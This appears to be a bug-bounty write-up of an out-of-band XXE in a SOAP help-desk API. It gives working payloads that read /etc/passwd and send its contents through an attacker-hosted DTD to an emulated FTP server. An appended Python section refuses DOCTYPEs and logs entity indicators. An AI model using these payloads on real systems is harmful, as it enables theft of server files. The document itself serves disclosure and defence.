SOAP-Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software
2020-11-22 03:21:17 Author: medium.com

Nik srivastava

I have omitted the application name, as it was a private program.

While registering for the application, I came across a WSDL file at a URL such as:

https://victim.com/services/ApiService?wsdl

I used the Wsdler Burp extension to parse the WSDL file, as shown in the image below:

[Screenshot: the WSDL parsed in the Wsdler extension]

Next, I sent a request to Repeater and started fuzzing it for XXE. First, I tried classic XXE payloads such as:

<?xml version="1.0"?><!DOCTYPE data [<!ELEMENT data (#ANY)><!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>

[Screenshot: response for the file /etc/passwd]

[Screenshot: response for the file /etc/shadow]

As the two responses above show, we can confirm that the vulnerability exists, but with this payload we can only enumerate files on the server, not read their contents.

In order to extract the file contents, we need to emulate an FTP server (if you have used a different approach, please comment).

I set up an xxe.dtd file on my server with the following payload:

<!ENTITY % d SYSTEM "file:///etc/passwd"><!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">

Download and run the emulated FTP server from the following link (make sure it listens on the port referenced in the DTD):

Now we need to send the following XXE payload in the vulnerable request:

<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>

[Screenshot: final XXE payload in the vulnerable request]

As soon as you send the vulnerable request, the contents of /etc/passwd start arriving at the emulated FTP server, as shown in the screenshot below:

[Screenshot: /etc/passwd contents received by the emulated FTP server]
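For the defender's side of the same path, here is an added example (my own code, not part of the original write-up or the affected product) covering both the classic payload and the OOB chain above. Both depend on an inline DOCTYPE in the SOAP body, which a SOAP API never needs, so the gateway can refuse any DOCTYPE before the real parser runs and log the entity indicators for detection. The function names are this example's own, and the sample bodies are constructed from the payloads shown in the post; the checks use only the Python standard library (regex triage plus an expat parser configured to abort on a DOCTYPE).

```python
"""Added example: gateway-side checks that stop the XXE paths shown above.

Both payloads in the write-up (the classic file:// entity and the OOB
parameter-entity chain fetching xxe.dtd) depend on an inline DOCTYPE.
A SOAP API never needs one, so refusing any DOCTYPE before the XML
parser runs defeats the whole class. Names below are this example's
own; the sample bodies are constructed from the payloads in the post.
"""
import re
import xml.parsers.expat as expat

# Constructed samples, modelled on the payloads shown in the write-up.
SAMPLE_BENIGN = b'<?xml version="1.0"?><sessionId>abc123</sessionId>'
SAMPLE_CLASSIC = (b'<?xml version="1.0"?>'
                  b'<!DOCTYPE data [<!ELEMENT data (#ANY)>'
                  b'<!ENTITY file SYSTEM "file:///etc/passwd">]>'
                  b'<data>&file;</data>')
SAMPLE_OOB = (b'<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> '
              b'%asd; %c;]> <sessionId>&rrr;</sessionId>')

_DOCTYPE_RE = re.compile(rb'<!DOCTYPE\b', re.IGNORECASE)
# Matches external entity declarations; for PUBLIC the captured literal is the public id.
_ENTITY_RE = re.compile(
    rb'''<!ENTITY\s+(?P<param>%\s+)?(?P<name>[^\s>]+)\s+'''
    rb'''(?P<kind>SYSTEM|PUBLIC)\s+(?P<q>["'])(?P<uri>[^"']*)(?P=q)''',
    re.IGNORECASE,
)


class XXEBlocked(ValueError):
    """Raised when a request body carries a DTD and is refused."""


def find_dtd_risks(body: bytes) -> dict:
    """Byte-level triage of a request body; the result is what you log or alert on."""
    risks = {
        "has_doctype": bool(_DOCTYPE_RE.search(body)),
        "external_entities": [],   # general entities such as &file;
        "parameter_entities": [],  # %asd; style entities used for OOB chains
        "external_uris": [],
    }
    for m in _ENTITY_RE.finditer(body):
        name = m.group("name").decode("ascii", "replace")
        risks["external_uris"].append(m.group("uri").decode("ascii", "replace"))
        key = "parameter_entities" if m.group("param") else "external_entities"
        risks[key].append(name)
    return risks


def reject_if_dtd(body: bytes) -> dict:
    """First layer: refuse any body containing a DOCTYPE; otherwise return the indicators."""
    risks = find_dtd_risks(body)
    if risks["has_doctype"]:
        raise XXEBlocked(f"DOCTYPE in request body; indicators={risks}")
    return risks


def parse_without_dtd(body: bytes) -> dict:
    """Second layer: expat configured so a DOCTYPE aborts parsing and external
    entity references are never fetched, independent of the regex triage."""
    state = {"root": None, "text": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XXEBlocked(f"DOCTYPE {name!r} refused by parser")

    def on_external_entity(context, base, system_id, public_id):
        return 0  # 0 tells expat to fail instead of resolving the URI

    def on_start(name, attrs):
        if state["root"] is None:
            state["root"] = name

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = state["text"].append
    parser.Parse(body, True)
    return {"root": state["root"], "text": "".join(state["text"])}


def is_blocked(body: bytes) -> bool:
    """True when either layer refuses the body."""
    try:
        reject_if_dtd(body)
        parse_without_dtd(body)
    except XXEBlocked:
        return True
    return False


if __name__ == "__main__":
    for label, body in (("benign", SAMPLE_BENIGN), ("classic", SAMPLE_CLASSIC), ("oob", SAMPLE_OOB)):
        print(label, "blocked" if is_blocked(body) else "accepted", find_dtd_risks(body))
```

Running the module prints that the benign body is accepted while both constructed payloads are blocked, and the indicator dictionary (entity names and the file:// or http:// URIs they point at) is the part worth shipping to the SIEM: a parameter entity with an external URI in a SOAP request is a strong OOB-XXE signal even when the gateway has already dropped the request.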


Source: https://medium.com/bugbountywriteup/soap-based-unauthenticated-out-of-band-xml-external-entity-oob-xxe-in-a-help-desk-software-c27a6abf182a?source=rss----7b722bfd1b8d--bug_bounty